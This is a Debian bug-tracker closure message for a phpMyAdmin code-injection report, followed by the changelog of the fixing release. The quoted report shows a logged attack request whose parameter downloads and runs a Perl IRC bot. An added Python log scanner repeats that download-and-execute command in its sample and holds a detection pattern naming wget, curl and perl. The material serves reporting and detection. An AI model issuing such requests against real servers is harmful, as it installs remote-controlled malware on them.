Your message dated Wed, 14 Oct 2009 10:22:16 +0000
with message-id <e1my0zo-0001mn...@ries.debian.org>
and subject line Bug#535044: fixed in phpmyadmin 4:3.2.2.1-1
has caused the Debian Bug report #535044,
regarding phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
535044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535044
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.11.8.1-5+lenny1
Severity: critical
Tags: security
Justification: root security hole
Hi,
After looking at my logs, I did notice a lot of attempts to break into
phpmyadmin through the following kind of URL:
82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET
//phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null&
It seems PHPMyAdmin shipped with Lenny is still vulnerable to this
remote exploit.
It is basically an IRC bot.
-- System Information:
Debian Release: 5.0.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores)
Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash
Versions of packages phpmyadmin depends on:
ii debconf [debconf-2 1.5.24 Debian configuration management sy
ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii perl 5.10.0-19 Larry Wall's Practical Extraction
ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii php5-mcrypt 5.2.6.dfsg.1-1+lenny3 MCrypt module for php5
ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5
Versions of packages phpmyadmin recommends:
ii apache2 2.2.9-10+lenny3 Apache HTTP Server metapackage
ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n
ii php5-gd 5.2.6.dfsg.1-1+lenny3 GD module for php5
Versions of packages phpmyadmin suggests:
ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries
-- debconf information:
phpmyadmin/setup-username: admin
* phpmyadmin/reconfigure-webserver:
phpmyadmin/restart-webserver: false
--- End Message ---
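The report above contains a single access-log line showing a request to phpMyAdmin's config.inc.php whose query parameter carries a download-and-execute command. An administrator reviewing their own logs for the same pattern wants a repeatable check rather than a grep by eye. The following script is an added example and is not part of the bug report or of the phpmyadmin package: it parses Apache combined-format access-log lines, keeps only requests aimed at phpMyAdmin's config.inc.php or setup script, and flags those whose decoded parameter values look like a shell pipeline. The three sample log lines are constructed for the example and use documentation-range IP addresses; the /phpmyadmin/ URL prefix and the list of tool names in the heuristic are assumptions that need adjusting for a given deployment.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" access-log layout; the trailing referer and user-agent
# fields are not needed for this check and are left unparsed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\S+) (?P<size>\S+)'
)

# Assumed install prefix (/phpmyadmin/). Requests that hand parameters to the
# config file or the setup script are the ones worth a second look; ordinary
# index.php traffic is left alone.
SENSITIVE_PATH_RE = re.compile(
    r'^/phpmyadmin/(?:.*/)?(?:config\.inc\.php|setup/)', re.IGNORECASE
)

# A decoded parameter value that reads like a shell pipeline: a downloader or
# interpreter name at a command boundary, a command separator, or a redirect
# to a path. Tool names are a constructed starting list, not an exhaustive one.
SHELL_HINT_RE = re.compile(
    r'(?:^|[;&|`\s])(?:wget|curl|perl|sh|bash|python)\b|[;|`]|>>?\s*/',
    re.IGNORECASE,
)


def normalise_path(path):
    """Collapse repeated slashes: //phpmyadmin//config.inc.php and
    /phpmyadmin/config.inc.php reach the same file, so they must hit the same rule."""
    return re.sub(r'/+', '/', path)


def parse_query(query):
    """Split a raw query string on '&' only (never ';', which here is part of
    the payload) and percent-decode each key and value exactly once."""
    pairs = []
    for chunk in query.split('&'):
        if chunk:
            key, _, value = chunk.partition('=')
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def classify(line):
    """Return a finding dict for a suspicious request line, or None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw_path, _, query = m.group('target').partition('?')
    path = normalise_path(raw_path)
    if not SENSITIVE_PATH_RE.search(path):
        return None
    for key, value in parse_query(query):
        if SHELL_HINT_RE.search(value):
            return {'ip': m.group('ip'), 'time': m.group('ts'), 'path': path,
                    'param': key, 'value': value, 'status': m.group('status')}
    return None


def scan(log_text):
    """Run classify() over every line and return the list of findings."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


# Constructed sample: one request shaped like the one in the report (with
# documentation-range addresses), one benign index.php hit, and one benign
# setup-script page view that must not be flagged.
SAMPLE_LOG = """\
192.0.2.10 - - [29/Jun/2009:03:32:31 +0200] "GET //phpmyadmin//config.inc.php?c=wget%20http://203.0.113.5/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null& HTTP/1.1" 404 512 "-" "Mozilla/4.0"
198.51.100.7 - - [29/Jun/2009:03:40:02 +0200] "GET /phpmyadmin/index.php?db=test HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.10 - - [29/Jun/2009:03:41:15 +0200] "GET /phpmyadmin/setup/index.php?page=servers HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} -> {f['path']} param {f['param']!r}: {f['value']}")
```

The query string is split by hand instead of with urllib's parse_qsl because older Python releases treat ';' as a second separator, which would cut the `;perl ...` part off the value and hide exactly the token the check is looking for; likewise urlsplit() would read the leading `//phpmyadmin` of the report's URL as a host name, so the path is separated with a plain partition on '?'. The HTTP status is kept in each finding: a 404 on config.inc.php says the probe missed, while a 200 on a parameterised setup-script request is the case that needs investigation.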
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:3.2.2.1-1
We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:
phpmyadmin_3.2.2.1-1.diff.gz
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1.diff.gz
phpmyadmin_3.2.2.1-1.dsc
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1.dsc
phpmyadmin_3.2.2.1-1_all.deb
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1_all.deb
phpmyadmin_3.2.2.1.orig.tar.gz
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 535...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Michal Čihař <ni...@debian.org> (supplier of updated phpmyadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Wed, 14 Oct 2009 10:58:28 +0200
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:3.2.2.1-1
Distribution: unstable
Urgency: low
Maintainer: Thijs Kinkhorst <th...@debian.org>
Changed-By: Michal Čihař <ni...@debian.org>
Description:
phpmyadmin - MySQL web administration tool
Closes: 535044 543460
Changes:
phpmyadmin (4:3.2.2.1-1) unstable; urgency=low
.
* New upstream version.
- Fixes XSS (PMASA-2009-6, CVE-2009-3696, CVE-2009-3697).
* Register documentation on doc-base.
* Use mootools from Debian package rather than own copy.
* Allow saving of configuration from setup script only after explicit action
from administrator (Closes: #535044, #543460).
Checksums-Sha1:
043ba4b0a190929ec451ac8ff8faff147b0fa2f3 1230 phpmyadmin_3.2.2.1-1.dsc
80c8e2091347236bfc0f135d3f92753f760e6947 3709036 phpmyadmin_3.2.2.1.orig.tar.gz
0bc06da6192a224c575edd95dddb5071f11db7a4 38175 phpmyadmin_3.2.2.1-1.diff.gz
05eec7a14f3941b2caf7e70f66883c7c3aceaa74 3703786 phpmyadmin_3.2.2.1-1_all.deb
Checksums-Sha256:
24548da5b8ee77e1bef8d0658689969ea825ee0f869435198326ce358047881a 1230 phpmyadmin_3.2.2.1-1.dsc
99957d98e2610d5f77f83db2e025caecae344d590c8f5694412e5f942d6c0768 3709036 phpmyadmin_3.2.2.1.orig.tar.gz
ad0d35e124fb6020d4ea5b1d74923ab1fb2bbc882909502fafcd17b2a23b1240 38175 phpmyadmin_3.2.2.1-1.diff.gz
ead0d01e3061c3989b5ee7d4a944a89d374948e4e30fa7c008de4c4bc67b5936 3703786 phpmyadmin_3.2.2.1-1_all.deb
Files:
77812ffab6319c421d847d9807321933 1230 web extra phpmyadmin_3.2.2.1-1.dsc
42637af1d7d390fb94ae5460b3f84153 3709036 web extra phpmyadmin_3.2.2.1.orig.tar.gz
728c63f9d79c655715a20d9980767ea0 38175 web extra phpmyadmin_3.2.2.1-1.diff.gz
c0f61d056b8d81b08da0d8aea2468370 3703786 web extra phpmyadmin_3.2.2.1-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAkrVkwUACgkQ3DVS6DbnVgQIhQCbBwo7+KDCrihyieNpLnjfQTMo
4dcAnRAvOTwt5xTLRKS0JIjI4B+CRR4s
=Jrvl
-----END PGP SIGNATURE-----
--- End Message ---